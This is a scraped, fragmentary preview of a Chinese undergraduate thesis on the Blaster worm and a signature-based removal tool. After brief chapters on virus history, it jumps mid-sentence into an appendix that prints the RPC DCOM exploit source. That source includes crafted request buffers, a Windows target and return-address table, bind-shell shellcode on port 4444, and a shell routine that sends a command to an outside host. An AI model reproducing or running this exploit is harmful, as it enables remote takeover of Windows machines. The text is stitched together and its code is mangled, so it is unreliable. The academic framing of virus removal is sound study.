计算机毕业设计（论文）-计算机病毒诊断与防治（含源程序） .doc

河北理工大学毕业设计说明书 第 1 页 共 83 页 全套源程序等，联系全套源程序等，联系 153893706153893706 目 录 引 言 1 第一章 计算机病毒简介 2 1.1 计算机病毒的认识 2 1.1.1 计算机病毒的产生 .2 1.1.2 计算机病毒的起源识 .4 1.2 计算机病毒的结构特征 4 1.2.1 病毒的结构.4 1.2.2 病毒的特征.5 1.3 计算机病毒的发展历史 6 1.4 蠕虫病毒 6 1.5 计算机病毒发展趋势 .10 第二章 冲击波病毒简述 .11 2.1 冲击波病毒介绍 .11 2.2 冲击波病毒的操作与症状 11 2.2.1 冲击波病毒的操作 11 2.2.2 计算机病毒的发作症状 12 2.3 冲击波病毒的具体说明 13 2.4 冲击波病毒的解决方案 .14 河北理工大学毕业设计说明书 第 2 页 共 83 页 2.4.1 应急解决 14 2.4.2 dos 下清除该病毒.15 2.4.3 安全模式下清楚该病毒 15 2.4.4 安全建议 17 第三章 vb 介绍 18 3.1 vb 的诞生18 3.2 vb 的特性18 3.3 vb 中的 api 函数19 3.3.1 什么是 api 函数 19 3.3.2 软件中涉及的 api 函数及其定义 20 第四章 冲击波的杀毒软件 .23 4.1 杀毒软件介绍 .23 4.2 杀毒软件具体实现 .25 4.3 杀毒软件流程图 .29 第五章 设计总结 .30 致谢.36 参考文献.37 附录.38 河北理工大学毕业设计说明书 第 3 页 共 83 页 摘摘 要要 目前，计算机病毒可以渗透信息社会的各个领域，给计算机系统带来了巨大的破坏和 潜在的威胁。为了确保信息的安全与畅通，因此研究对算机病毒的分析与清除的方法是迫 在眉睫的，本论文从对病毒的分析入手，结合计算机病毒传染的现状，概述了计算机病毒 的发展历史及危害性，给出计算机病毒的一种计算模型，并针对具体的实例冲击波病毒， 初步分析其有关性质和作用原理，仔细阅读它的源程序，根据病毒的发作机制，提出了它 的清除方式。 冲击波病毒主要是利用微软系统的漏洞，实现其破坏目的的。我主要是采用对所有的 文件进行二进制扫描，如果发现病毒特征码就认为是病毒感染文件，保留文件的路径后， 根据路径删除感染文件，同时清楚注册表中被病毒改写过的内容。从而最终实现其杀毒的 目的。 关键词：病毒 冲击波 二进制 路径 注册表 河北理工大学毕业设计说明书 第 4 页 共 83 页 abstractabstract at present, computer virus could permeate every region of the society. and it brings great destruction and potential threat to the computer system. in order to insure the safety and expedite of the information, so study the analysis which is computer virus and the method which is used to clear away the virus is pressing. this paper generalizes the development and the harm of the computer virus, by analyzing the actuality of the computer virus and beginning with analysis of the computer virus. we also get a compute model of the computer virus , our model is more practical and reasonable in respect of the computer virus characters of infection and spread. according a in detail example that is worm. blaster, preliminarily analyze the character and action principle about the worm. blaster, carefully read its source program，according to the outbreak mechanism of the virus bring forward its way which is used to clear way. worm. blaster accomplishes destructive aim by using the leak of microsoft system. we mainly use binary scanning which is used for all files. if finding out characteristic, we will consider that it is the file that is infected by computer virus. after conserving the path which is infected file, according this path delete this file. at the same time clear off the content of the register which is recomposed by computer virus. thereby we finally accomplish the aim which is clear off virus. keywords: virus worm. blaster binary path register 河北理工大学毕业设计说明书 第 5 页 共 83 页 引 言 随着计算机在社会生活各个领域的广泛运用，计算机病毒攻击与防范技术 也在不断拓展。据报道，世界各国遭受计算机病毒感染和攻击的事件数以亿计， 严重地干扰了正常的人类社会生活，给计算机网络和系统带来了巨大的潜在威 胁和破坏。与此同时，病毒技术在战争领域也曾广泛的运用，在海湾战争、近 期的科索沃战争中，双方都曾利用计算机病毒向敌方发起攻击，破坏对方的计 算机网络和武器控制系统，达到了一定的政治目的与军事目的。可以预见，随 着计算机、网络运用的不断普及、深入，防范计算机病毒越来越受到各国的高 度重视。 在科技年鉴记载的种种丰功伟绩当中，在科技年鉴记载的种种丰功伟业当 中，fred cohen 的贡献绝对堪称一绝：是他把“病毒”(virus)一词引进电脑 词典。 在 1984 年发表的研究论文中，这位 new haven 大学教授首度使用“病 毒”一词，用来形容会自我扩散的程序及其带来的威胁，并建议可能的防御之 道。21 世纪全世界的计算机都将通过 internet 联到一起，这是一个信息的社 会、网络的社会，信息安全的内涵也就发生了根本的变化。它不仅从一般性的 防卫变成了一种非常普通的防范，而且还从一种专门的领域变成了无处不在。 计算机病毒是能改变或破坏存在计算机中的数据的程序，而且它能在操作 过程中不断自我复制，从而造成损害。1987 年，计算机病毒在美国四处蔓延， 而且第一种计算机病毒“小球”在当年年底传播到我国。从那以后，已经发现 进口和国内的病毒。迄今为止，计算机病毒已经增加到 20,000 多种；其中 90以上能攻击微型计算机。 在本次设计中，我主要是选择了冲击波病毒作为研究的课题。通过对冲击 波的有关性质和作用原理进行系统的分析，找到它的发作机制，提出了一套事 实可行的解决方案。主要是采用对所有的文件进行二进制扫描，如果发现病毒 特征码就认为是病毒感染文件，保留文件的路径后，根据路径删除感染文件， 同时清楚注册表中被病毒改写过的内容。 河北理工大学毕业设计说明书 第 6 页 共 83 页 第一章 计算机病毒的简介 1、1 计算机病毒的认识 什么是计算机病毒，怎样预防及消灭病毒？关于这个话题，众说纷纭。有 人说，只要拥有了一套功能强大的杀毒软件便万事大吉；有人说，只要不上网 就可抗拒病毒的侵害；还有人认为，只要定期格式化硬盘就能把病毒扼制在萌 芽状态面对种种说法，其实病毒不是那么神奇，对它的预防与剿灭也远不 是如此简单。计算机病毒(computer virus)最早是由美国计算机病毒研究专家 f.conhen 博士提出， 病毒，是指能够破坏计算机系统，影响计算机工作并能实现自我复制的一 段程序或指令代码。它有着与生物病毒极为相似的特点。一是寄生性，它们大 多依附在别的程序上面。二是隐蔽性，它们是悄然进入系统的，人们很难察觉。 三是潜伏性，它们通常是潜伏在计算机程序中，只在一定条件下才发作的。四 是传染性，它们能够自我复制繁殖，通过传输媒介蔓延。五是破坏性，轻则占 用一定数量的系统资源，重则破坏整个系统。 随着计算机工业的发展，病毒程序层出不穷，到了 21 世纪的今天它的种类 已经达到千万种。虽然病毒的类型有很多，变型的病毒更无法计算，但是就其 传染对象来分只不过四类：bios、硬盘引导区、操作系统与应用程序病毒。 1、1、1 计算机病毒的产生 计算机病毒的产生是计算机技术和以计算机为核心的社会信息化进程发展 到一定阶段的必然产物。它产生的背景是： （1）计算机病毒是计算机犯罪的一种新的衍化形式 河北理工大学毕业设计说明书 第 7 页 共 83 页 计算机病毒是高技术犯罪, 具有瞬时性、动态性和随机性。不易取证, 风 险小破坏大, 从而刺激了犯罪意识和犯罪活动。是某些人恶作剧和报复心态在 计算机应用领域的表现。 （2）计算机软硬件产品的危弱性是根本的技术原因 计算机是电子产品。数据从输入、存储、处理、输出等环节, 易误入、篡 改、丢失、作假和破坏；程序易被删除、改写；计算机软件设计的手工方式,效 率低下且生产周期长；人们至今没有办法事先了解一个程序有没有错误, 只能 在运行中发现、修改错误, 并不知道还有多少错误和缺陷隐藏在其中。这些脆 弱性就为病毒的侵入提供了方便。 （3）微机的普及应用是计算机病毒产生的必要环境 1983 年 11 月 3 日美国计算机专家首次提出了计算机病毒的概念并进行了 验证。几年前计算机病毒就迅速蔓延,到我国才是近年来的事。而这几年正是我 国微型计算机普及应用热潮。微机的广泛普及, 操作系统简单明了, 软、硬件 透明度高, 基本上没有什么安全措施,能够透彻了解它内部结构的用户日益增多, 对其存在的缺点和易攻击处也了解的越来越清楚, 不同的目的可以做出截然不 同的选择。目前, 在 ibmpc 系统及其兼容机上广泛流行着各种病毒就很说明这 个问题。 其产生原因也不外乎以下几种： 1. 一些计算机爱好者出于好奇或者兴趣，也有的是为了满足自己的表现 欲。故意编制出一些特殊的计算机程序，以显示自己的才干。次类病 毒破坏性一般不大。 2. 产生于个别人的报复心理，此种病毒对电脑用户会造成一定的灾难。 3. 来源于软件加密。一些商业软件公司为了不让自己的软件被非法复制 和使用，运用加密技术，编写一些特殊程序附加在正版软件上， 如遇 到非法使用，则此类程序自动激活，于是又会产生新的病毒，如巴基 斯坦病毒。 4. 用于研究或实验而设计的“有用“的程序，由于某种原因失去控制而 扩散出来 河北理工大学毕业设计说明书 第 8 页 共 83 页 5. 由于政治，经济和军事等特殊目的，一些组织或个人也会编写一些程 序用于进攻对方的电脑，给对法官造成灾难或者直接经济损失。 其感染的途径主要有 1. 引进的计算机系统和软件中带有病毒 2. 各类出国人员带回的计算机和软件染有病毒 3. 染有病毒的游戏软件 4. 非法拷贝病毒 5. 计算机生产，经营单位销售的计算机和软件染有病毒 6. 维修部门交叉感染 7. 有人研制，改造病毒 8. 敌对分子以病毒为媒体或武器进行宣传和破坏 9. 通过互联网（访问 web，下载 e-mail 和文件等）传入的 1、1、2 计算机病毒的起源 计算机病毒并非是最近才出现的新产物。事实上，早在 1949 年，距离第一 部商用电脑的出现仍有好几年，电脑的先驱者冯.诺伊曼（john von neumann） 在他所提出的一篇论问复杂自动装置的理论及组织的进行中勾勒出了病程 序的蓝图。他指出，数据和程序并无本质的区别。十年后，在美国电话电报公 司（at unsigned char request1= 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xe8,0x03 ,0x00,0x00,0xe5,0x00,0x00,0x00,0xd0,0x03,0x00,0x00,0x01,0x00,0x04,0x0 0,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xf d,0xcc,0x45 ,0x64,0x49,0xb0,0x70,0xdd,0xae,0x74,0x2c,0x96,0xd2,0x60,0x5e,0x0d,0x0 0,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5e,0x0d,0x00,0x02,0x00,0x00,0x0 0,0x7c,0x5e 河北理工大学毕业设计说明书 第 45 页 共 83 页 ,0x0d,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xf1,0xf 1,0x2a,0x4d ,0xce,0x11,0xa6,0x6a,0x00,0x20,0xaf,0x6e,0x72,0xf4,0x0c,0x00,0x00,0x0 0,0x4d,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0xf0,0xad,0xb a,0x00,0x00 ,0x00,0x00,0xa8,0xf4,0x0b,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x0 0,0x4d,0x45 ,0x4f,0x57,0x04,0x00,0x00,0x00,0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x0 0,0xc0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x0 0,0xc0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x0 0,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xc c,0xc8,0x00 ,0x00,0x00,0x4d,0x45,0x4f,0x57,0x28,0x03,0x00,0x00,0xd8,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc4,0x28,0xcd,0x0 0,0x64,0x29 ,0xcd,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xb9,0x01,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xab,0x01,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa5,0x01,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa6,0x01,0x00,0x0 河北理工大学毕业设计说明书 第 46 页 共 83 页 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa4,0x01,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xad,0x01,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xaa,0x01,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x0 0,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x0 0,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x0 0,0x01,0x10 ,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x50,0x00,0x00,0x00,0x4f,0xb6,0x88,0x2 0,0xff,0xff ,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x01,0x10 ,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x0 0,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x4 6,0x10,0x00 河北理工大学毕业设计说明书 第 47 页 共 83 页 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0c,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x0 0,0x01,0x00 ,0x00,0x00,0x70,0xd8,0x98,0x93,0x98,0x4f,0xd2,0x11,0xa9,0x3d,0xbe,0x5 7,0xb2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xc c,0x80,0x00 ,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x0 0,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x0 0,0xc0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x4 6,0x3b,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x4 6,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xc5,0x17,0x0 3,0x80,0x0e ,0xe9,0x4a,0x99,0x99,0xf1,0x8a,0x50,0x6f,0x7a,0x85,0x02,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xc c,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0xd8,0xda,0x0d,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2f,0x0c,0x00,0x00,0x00,0x00,0x0 河北理工大学毕业设计说明书 第 48 页 共 83 页 0,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x0 0,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xc c,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xc c,0x68,0x00 ,0x00,0x00,0x0e,0x00,0xff,0xff,0x68,0x8b,0x0b,0x00,0x02,0x00,0x00,0x0 0,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00; unsigned char request2= 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5c,0x00,0x5c,0x00; unsigned char request3= 0x5c,0x00 ,0x43,0x00,0x24,0x00,0x5c,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x0 0,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x0 0,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x0 0,0x31,0x00 ,0x2e,0x00,0x64,0x00,0x6f,0x00,0x63,0x00,0x00,0x00; unsigned char *targets = 河北理工大学毕业设计说明书 第 49 页 共 83 页 “windows nt sp4 (english)“, “windows nt sp5 (chineese)“, “windows nt sp6 (chineese)“, “windows nt sp6a (chineese)“, “windows 2000 nosp (polish)“, “windows 2000 sp3 (polish)“, “windows 2000 sp4 (spanish)“, “windows 2000 nosp1 (english)“, “windows 2000 nosp2 (english)“, “windows 2000 sp2-1 (english)“, “windows 2000 sp2-2 (english)“, “windows 2000 sp3-2 (english)“, “windows 2000 nosp (chineese)“, “windows 2000 sp1 (chineese)“, “windows 2000 sp2 (chineese)“, “windows 2000 sp3 (chineese)“, “windows 2000 sp4 (chineese)“, “windows 2000 sp3 (german)“, “windows 2000 nosp (japaneese“, “windows 2000 sp1 (japaneese)“, “windows 2000 sp2 (japaneese)“, “windows 2000 nosp (korean)“, “windows 2000 sp1 (korean)“, “windows 2000 sp2 (korean)“, “windows 2000 nosp (mexican)“, “windows 2000 sp1 (mexican)“, “windows xp nosp (english)“, “windows sp1-2 (english)“, “windows 2k3 (english)“, 河北理工大学毕业设计说明书 第 50 页 共 83 页 “windows 2000 sp3 (german)“, “windows 2000 sp4-1 (german)“, “windows 2000 sp4-2 (german)“, “windows xp sp1 (german)“, “windows 2000 server sp1 (french)“, “windows 2000 server sp4 (french)“, “windows xp nosp (french)“, “windows xp sp1 (french)“, “windows 2000 sp0 (english)“, “windows 2000 sp1 (english)“, “windows 2000 sp2 (english)“, “windows 2000 sp3 (english)“, “windows 2000 sp4 (english)“, “windows xp sp0 (english)“, “windows xp sp1-1 (english)“, “windows xp sp2 (english)“, “windows 2000 advanced server sp3 (english)“, “all/winxp/win2k“, null ; unsigned long offsets = 0x77e527f3, 0x77cfdaee, 0x77ac0ef0, 0x77c3eaf0, 0x774d3fe3, 0x77292ce4, 河北理工大学毕业设计说明书 第 51 页 共 83 页 0x77133ba5, 0x777416e8, 0x772b49e2, 0x77b524e8, 0x775cfa2e, 0x772ae3e2, 0x778b89e6, 0x772b49e0, 0x77444342, 0x77294cdf, 0x777a882e, 0x77e527f3, 0x778b89e5, 0x772b49df, 0x772ae3e1, 0x778b89e5, 0x772b49df, 0x772ae3e1, 0x778b89e8, 0x77e3afe9, 0x77db37d7, 0x77b05422, 0x77292ce3, 0x77294ce0, 0x7756c2e2, 0x77fc18d4, 0x774b3ee4, 0x7756c2e2, 0x774a75d4, 河北理工大学毕业设计说明书 第 52 页 共 83 页 0x77fc18d4, 0x77e81674, 0x77e829ec, 0x77e824b5, 0x77e8367a, 0x77f92a9b, 0x77e9afe3, 0x77e626ba, 0x77d737db, 0x77e2afc5, 0x010016c6 ; unsigned char sc= “x46x00x58x00x4ex00x42x00x46x00x58x00“ “x46x00x58x00x4ex00x42x00x46x00x58x00x46x00x58x00“ “x46x00x58x00x46x00x58x00“ “xffxffxffxff“ /* return address */ “xccxe0xfdx7f“ /* primary thread data block */ “xccxe0xfdx7f“ /* primary thread data block */ /* port 4444 bindshell */ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ 河北理工大学毕业设计说明书 第 53 页 共 83 页 “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90“ “x90x90x90x90x90x90x90xebx19x5ex31xc9x81xe9x89xff“ “xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2“ “xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80“ “xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09“ “xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6“ “xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf“ “xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad“ “xbex32x94x09xf9x22x6bxb6xd7x4cx4cx62xccxdax8ax81“ “xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81“ “xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80“ “xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80“ “xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80“ “xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80“ “xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80“ “xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81“ “xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6“ “xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3“ “x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50“ “xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4“ “x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4“ “xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4“ “x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f“ “xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b“ “x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80“ “x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89“ “x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80“ 河北理工大学毕业设计说明书 第 54 页 共 83 页 “xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83“ “x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83“ “x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78“ “x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c“ “xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b“ “x6ax6dxcaxddxe4xf0x90x80x2fxa2x04“; unsigned char request4= 0x01,0x10 ,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x20,0x00,0x00,0x00,0x30,0x00,0x2d,0x0 0,0x00,0x00 ,0x00,0x00,0x88,0x2a,0x0c,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x0 0,0x28,0x8c ,0x0c,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x0 0 ; void shell(int sock) fd_set fd_read; char buff1024, *cmd=“echo open coke13.ddo.jpo int n; 河北理工大学毕业设计说明书 第 55 页 共 83 页 fd_zero( fd_set(sock, fd_set(0, send(sock, cmd, strlen(cmd), 0); while(1) fd_set(sock, fd_set(0, if (select(fd_setsize, 河北理工大学毕业设计说明书 第 57 页 共 83 页 printf(“- targets:n“); for (len=0; targetslen != null; len+) printf(“- %dt%sn“, len, targetslen); printf(“n“); exit(1); /* yeah, get over it :) */ target_id = atoi(argv1); ret = offsetstarget_id; printf(“- using return address of 0x%.8xn“, ret); memcpy(sc+36, (unsigned char *) target_ip.sin_family = af_inet; target_ip.sin_addr.s_addr = inet_addr(argv2); target_ip.sin_port = htons(port); if (sock=socket(af_inet,sock_stream,0) = -1) perror(“- socket“); return(0); if(connect(sock,(struct sockaddr *) 河北理工大学毕业设计说明书 第 58 页 共 83 页 return(0); len=sizeof(sc); memcpy(buf2,request1,sizeof(request1); len1=sizeof(request1); *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4); len1=len1+sizeof(request4); *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)- 0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)- 0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)- 0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+